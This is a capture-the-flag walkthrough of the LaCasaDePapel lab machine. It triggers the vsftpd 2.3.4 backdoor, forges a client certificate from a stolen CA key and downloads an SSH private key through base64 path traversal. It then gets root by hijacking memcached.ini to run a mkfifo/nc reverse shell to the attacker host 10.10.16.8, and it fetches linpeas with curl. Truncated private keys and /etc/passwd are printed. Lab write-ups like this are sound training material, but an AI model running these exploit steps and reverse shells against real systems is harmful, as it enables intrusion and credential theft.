```
$ nmap -sC -sV -oA nmapscan 10.10.10.131
# -sC : Scan with default NSE scripts.
# -sV : Attempts to determine the version of the service running on the port
# -oA : Output in the three major formats at once
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp      vsftpd 2.3.4
22/tcp  open  ssh      OpenSSH 7.9 (protocol 2.0)
80/tcp  open  http     Node.js (Express middleware)
443/tcp open  ssl/http Node.js Express framework
```
HTTP 80/tcp
Playing around with the site, it seems we can't pull anything out of it.
view-source: doesn't have any special information.
robots.txt: we can't connect to the server at lacasadepapel.htb, so let's add the domain to /etc/hosts.
Why doesn't the website trust my certificate?
After some searching, it turns out we need a certificate from the root CA.
Now "Accept the risk and continue".
Now we need a certificate from the host.
FTP 21/tcp : vsftpd 2.3.4
Let's see if this version is vulnerable. For a fast search I use searchsploit, and it seems there is a Metasploit module for it. Since my approach is OSCP-style, I won't use Metasploit.
To reach vsf_sysutil_extra() you have to log in with a smiley face :)
That is \x3A\x29 in hex (ASCII codes).
This function lives in sysdeputil.c, the file for "highly system dependent utilities - e.g. authentication, capabilities". Reading that file shows that the function opens a new TCP socket listening on port 6200 and spawns a shell when something connects to that port.
```
$ telnet 10.10.10.131 21
Trying 10.10.10.131...
Connected to 10.10.10.131.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER :)
331 Please specify the password.
PASS smile
# if it just sits waiting, that means the backdoor has opened
```
Psy Shell
```
# Connect to the shell
$ nc 10.10.10.131 6200
Psy Shell v0.9.9 (PHP 7.2.10 — cli) by Justin Hileman
help
  help       Show a list of commands. Type `help [foo]` for information about [foo]. Aliases: ?
  ls         List local, instance or class variables, methods and constants. Aliases: list, dir
  dump       Dump an object or primitive.
  doc        Read the documentation for an object, class, constant, method or property. Aliases: rtfm, man
  show       Show the code for an object, class, constant, method or property.
  wtf        Show the backtrace of the most recent exception. Aliases: last-exception, wtf?
  whereami   Show where you are in the code.
  throw-up   Throw an exception or error out of the Psy Shell.
  timeit     Profiles with a timer.
  trace      Show the current call stack.
  buffer     Show (or clear) the contents of the code input buffer. Aliases: buf
  clear      Clear the Psy Shell screen.
  edit       Open an external editor. Afterwards, get produced code in input buffer.
  sudo       Evaluate PHP code, bypassing visibility restrictions.
  history    Show the Psy Shell history. Aliases: hist
  exit       End the current session and return to caller. Aliases: quit, q
ls
Variables: $tokyo
whereami
From phar:///usr/bin/psysh/src/functions.php:307:
    302|             $config['colorMode'] = Configuration::COLOR_MODE_FORCED;
    303|         } elseif ($input->getOption('no-color')) {
    304|             $config['colorMode'] = Configuration::COLOR_MODE_DISABLED;
    305|         }
    306|
  > 307|         $shell = new Shell(new Configuration($config));
    308|
    309|
    310|         if ($usageException !== null || $input->getOption('help')) {
    311|             if ($usageException !== null) {
    312|                 echo $usageException->getMessage() . PHP_EOL . PHP_EOL;

# Since this is PHP we can use PHP functions to enumerate
get_current_user()
=> "root"
scandir("/root")
PHP Warning:  scandir(/root): failed to open dir: Permission denied in phar://eval()'d code on line 1
scandir("/home")
=> [".", "..", "berlin", "dali", "nairobi", "oslo", "professor"]
scandir("/home/berlin")
=> [".", "..", ".ash_history", ".ssh", "downloads", "node_modules", "server.js", "user.txt"]
scandir("/home/berlin/downloads")
=> [".", "..", "SEASON-1", "SEASON-2", "Select a season"]
scandir("/home/berlin/downloads/SEASON-1/")
=> [".", "..", "01.avi", "02.avi", "03.avi", "04.avi", "05.avi", "06.avi", "07.avi", "08.avi", "09.avi", "10.avi", "11.avi", "12.avi", "13.avi", "Donwload a video"]
# when trying file_get_contents on these we get nothing
scandir("/home/berlin/downloads/SEASON-2/")
=> [".", "..", "01.avi", "02.avi", "03.avi", "04.avi", "05.avi", "06.avi", "07.avi", "08.avi", "09.avi", "Donwload a video"]
# when trying file_get_contents on these we get nothing
# when trying file_get_contents on "Select a season" we get nothing
scandir("/home/berlin/.ssh")
PHP Warning:  scandir(/home/berlin/.ssh): failed to open dir: Permission denied in phar://eval()'d code on line 1
echo file_get_contents("/home/berlin/user.txt")
PHP Warning:  file_get_contents(/home/berlin/user.txt): failed to open stream: Permission denied in phar://eval()'d code on line 1
scandir("/home/dali")
=> [".", "..", ".ash_history", ".config", ".qmail-default", ".ssh", "server.js"]
scandir("/home/dali/.ssh")
=> [".", "..", "authorized_keys", "known_hosts"]
echo file_get_contents("/home/dali/.ssh/authorized_keys")
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsDHKXtzjeyuWjw42RbtoDy2c6lWdtfEzsmqmHrbJDY2hDcKWekWouWhe/NTCQFim6weKtsEdTzh0Qui+6jKc8/ZtpKzHrXiSXSe48JwpG7abmp5iCihzDozJqggBNoAQrvZqBhg6svcKh8F0kTnxUkBQgBm4kjOPteN+TfFoNIod7DQ72/N25D/lVThCLcStbPkR8fgBz7TGuTTAsNFXVwjlsgwi2qUF9UM6C1JkMBk5Y9ssDHiu4R35R5eCl4EEZLL946n/Gd5QB7pmIRHMkmt2ztOaKU4xZthurZpDXt+Et+Rm3dAlAZLO/5dwjqIfmEBS1eQ4sT8hlUkuLvjUDw== thek@ThekMac.local
echo file_get_contents("/home/dali/.ssh/known_hosts")
127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNli8Xx10a0s+zrkT1eVfM1kRaAQaK+a/mxYxhPxpK0094QFQBcVrvrXb3+j4M8l2G/C9CtQRWVXpX8ajWhYRik=
echo file_get_contents("/home/dali/.qmail-default")
| bounce saying This\ address\ no\ longer\ accepts\ mail.
echo file_get_contents("/home/dali/server.js")
const net = require('net')
const spawn = require('child_process').spawn
const server = net.createServer(function(socket) {
  const sh = spawn('/usr/bin/psysh')
  sh.stdin.resume()
  sh.stdout.on('data', function (data) {
    socket.write(data)
  })
  sh.stderr.on('data', function (data) {
    socket.write(data)
  })
  socket.on('data', function (data) {
    try {
      sh.stdin.write(data)
    } catch (e) {
      socket.end()
    }
  })
  socket.on('end', function () { })
  socket.on('error', function () { })
});
server.listen(6200, '0.0.0.0');
# This server.js file lets any client that can connect to port 6200 on the host
# interact with a PHP interactive shell (psysh).
scandir("/home/nairobi")
=> [".", "..", "ca.key", "download.jade", "error.jade", "index.jade", "node_modules", "server.js", "static"]
echo file_get_contents("/home/nairobi/server.js")
PHP Warning:  file_get_contents(/home/nairobi/server.js): failed to open stream: Permission denied in phar://eval()'d code on line 1
echo file_get_contents("/home/nairobi/ca.key")
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDPczpU3s4Pmwdb
...snip...
53udBEzjt3WPqYGkkDknVhjD
-----END PRIVATE KEY-----
scandir("/home/oslo/")
=> [".", "..", "Maildir", "inbox.jade", "index.jade", "node_modules", "package-lock.json", "server.js", "static"]
scandir("/home/professor")
=> [".", "..", ".ash_history", ".ssh", "memcached.ini", "memcached.js", "node_modules"]
scandir("/home/professor/.ssh")
PHP Warning:  scandir(/home/professor/.ssh): failed to open dir: Permission denied in phar://eval()'d code on line 1
echo file_get_contents("/home/professor/memcached.ini")
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js
# that could be used for privilege escalation
# users?
echo file_get_contents("/etc/passwd")
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
chrony:x:100:101:chrony:/var/log/chrony:/sbin/nologin
dali:x:1000:1000:dali,,,:/home/dali:/usr/bin/psysh
berlin:x:1001:1001:berlin,,,:/home/berlin:/bin/ash
professor:x:1002:1002:professor,,,:/home/professor:/bin/ash
vsftp:x:101:21:vsftp:/var/lib/ftp:/sbin/nologin
memcached:x:102:102:memcached:/home/memcached:/sbin/nologin
# copy and save this file
```
Now we have /etc/passwd (the list of users) and ca.key, but what does ca.key do?
That means with ca.key we can generate a certificate for ourselves and connect to port 443.
Why do we need a certificate?
When you connect to a website via HTTPS, the server sends its SSL/TLS certificate to your browser. Your browser verifies the certificate and, if it is valid, establishes an encrypted session with the server. This ensures that the communication between the client and the server is protected.
In mutual TLS (mTLS), the client (e.g., your browser) must also present its own certificate to the server. This adds an extra layer of authentication because both sides are proving their identity through certificates. For the server to trust the client’s certificate, the client certificate must be signed by a trusted Certificate Authority (CA). The server checks this certificate just like the client checks the server’s certificate in traditional TLS.
If you can obtain the CA’s private key, you could generate a valid client certificate, allowing you to authenticate to the server.
Generate client certificate with ca.key
```
# Create the client key
$ openssl genrsa -out client.key 4096
# Create the signing request (csr)
$ openssl req -new -key client.key -out client.csr
-----
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:US
Locality Name (eg, city) []:US
Organization Name (eg, company) [Internet Widgits Pty Ltd]:US
Organizational Unit Name (eg, section) []:Us
Common Name (e.g. server FQDN or YOUR name) []:US
Email Address []:US@US.com

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
# just press enter for no password
# Sign the CSR to create a client certificate
$ openssl x509 -req -in client.csr -CA lacasadepapel-htb.pem -CAkey ca.key -CAcreateserial -out client.crt -days 365 -sha256
Certificate request self-signature ok
subject=C=US, ST=US, L=US, O=US, OU=Us, CN=US, emailAddress=US@US.com
# now we have client.crt, but we need to import it into Firefox, so we create a PKCS#12 (.p12) file
$ openssl pkcs12 -export -inkey client.key -in client.crt -out client.p12
Enter Export Password:
Verifying - Enter Export Password:
# press enter for no password
```
Import client.p12 in firefox
Now let's see if we can view the website.
Press OK, and now we can continue our enumeration from here.
SSL/HTTP 443 again
This looks like /home/berlin/downloads, so let's try to download the files and see what is in them.
```
# the (1) copies are season 2
$ ls -la | grep .avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 01(1).avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 01.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 02(1).avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 02.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 03(1).avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 03.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 04(1).avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 04.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 05(1).avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 05.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 06(1).avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 06.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 07(1).avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 07.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 08(1).avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 08.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 09(1).avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 09.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 10.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 11.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 12.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 13.avi
# all the files are empty
```
Unfortunately we can't download id_rsa the way we downloaded the episodes; that didn't work... wait a second, how did we even download those?
```
# looking at the URLs, we see they change only slightly
https://lacasadepapel.htb/file/U0VBU09OLTEvMDEuYXZp
https://lacasadepapel.htb/file/U0VBU09OLTEvMDIuYXZp
https://lacasadepapel.htb/file/U0VBU09OLTEvMDMuYXZp
https://lacasadepapel.htb/file/U0VBU09OLTEvMDQuYXZp
https://lacasadepapel.htb/file/U0VBU09OLTEvMDUuYXZp
```
Now we need to work out what that string says.
So this is a base64-encoded string in the format SEASON-1/01.avi; now we will try to pull id_rsa with the same method.
We use the same site to encode "../.ssh/id_rsa" -> Li4vLnNzaC9pZF9yc2E=
```
# now we will get the file
$ curl https://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E=
curl: (60) server verification failed: certificate signer not trusted. (CAfile: /etc/ssl/certs/ca-certificates.crt CRLfile: none)
# to get past this add -k
$ curl -k https://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E=
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcn
...snip...
X3a0iF5JE3kAAAAYYmVybGluQGxhY2FzYWRlcGFwZWwuaHRiAQID
-----END OPENSSH PRIVATE KEY-----
# save it to id_rsa
$ curl -k https://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E= > id_rsa
# and now let's try to log in
$ ssh -i id_rsa berlin@10.10.10.131
berlin@10.10.10.131's password:
# seems like this key is not for berlin but for another user; since we have passwd we can see which users have a login shell
$ cat passwd | grep ash
root:x:0:0:root:/root:/bin/ash
berlin:x:1001:1001:berlin,,,:/home/berlin:/bin/ash
professor:x:1002:1002:professor,,,:/home/professor:/bin/ash
# tried root out of greed, same result as berlin, so it's professor
$ ssh -i id_rsa professor@10.10.10.131
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0664 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
professor@10.10.10.131's password:
# to get past this use sudo
$ sudo ssh -i id_rsa professor@10.10.10.131
# ... (ASCII-art "lacasadepapel" login banner) ...
lacasadepapel [~]$ id
uid=1002(professor) gid=1002(professor) groups=1002(professor)
lacasadepapel [~]$ pwd
/home/professor
lacasadepapel [~]$ ls
memcached.ini  memcached.js   node_modules
```
```
# what is my ip?
$ ifconfig tun0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 10.10.16.8  netmask 255.255.254.0  destination 10.10.16.8
# inet is the IPv4 address
# To transfer the file we start a python web server and download from it
$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
# now download the file on the target
lacasadepapel [~]$ curl http://10.10.16.8:8000/linpeas.sh -o peas.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  318k  100  318k    0     0   266k      0  0:00:01  0:00:01 --:--:--  266k
lacasadepapel [~]$ chmod +x peas.sh
lacasadepapel [~]$ ./peas.sh
================================( Processes, Cron, Services, Timers & Sockets )================================
 5496 nobody    0:27 /usr/bin/node /home/professor/memcached.js
# this file lives in professor's home folder
lacasadepapel [~]$ ls -la
total 344
drwxr-sr-x    4 professor professor      4096 Oct 12 02:24 .
drwxr-xr-x    7 root      root           4096 Feb 16  2019 ..
lrwxrwxrwx    1 root      professor         9 Nov  6  2018 .ash_history -> /dev/null
drwx------    2 professor professor      4096 Jan 31  2019 .ssh
-rw-r--r--    1 root      root             88 Jan 29  2019 memcached.ini
-rw-r-----    1 root      nobody          434 Jan 29  2019 memcached.js
drwxr-sr-x    9 root      professor      4096 Oct  3  2022 node_modules
-rwxr-xr-x    1 professor professor    325864 Oct 12 02:24 peas.sh
# we can't read memcached.js but we can read memcached.ini
lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js
# since the .js file is running, the .ini is being used too, and that file runs things through sudo
# we can't write to it since we are not its owner (root)
# but we own the folder :) so we can create a file of the same name, rename it or even delete it (as best practice, don't delete)
lacasadepapel [~]$ mv memcached.ini memcached.old
lacasadepapel [~]$ ls
memcached.js   memcached.old  node_modules   peas.sh
# now create a reverse shell and run it from the .ini file
```
We will use the revshells site.
```
# set up a listener
$ nc -lvnp 6868
# create the shell file and memcached.ini
lacasadepapel [~]$ cd /tmp/
lacasadepapel [/tmp]$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.8 6868 >/tmp/f' >> shell.sh
Try 'chmod --help' for more information.
lacasadepapel [/tmp]$ chmod +x shell.sh
lacasadepapel [/tmp]$ cd ~
# since there is no nano or vim we use vi; to save a file in vi press ESC and type :wq
lacasadepapel [~]$ vi memcached.ini
[program:memcached]
command = su -c /tmp/shell.sh
# and now wait for a connection on your nc
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.131] 41927
/bin/sh: can't access tty; job control turned off
/ # /bin/sh: fa: not found
/ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # wc /home/berlin/user.txt
1 1 33 /home/berlin/user.txt
/ # wc /root/root.txt
1 1 33 /root/root.txt
```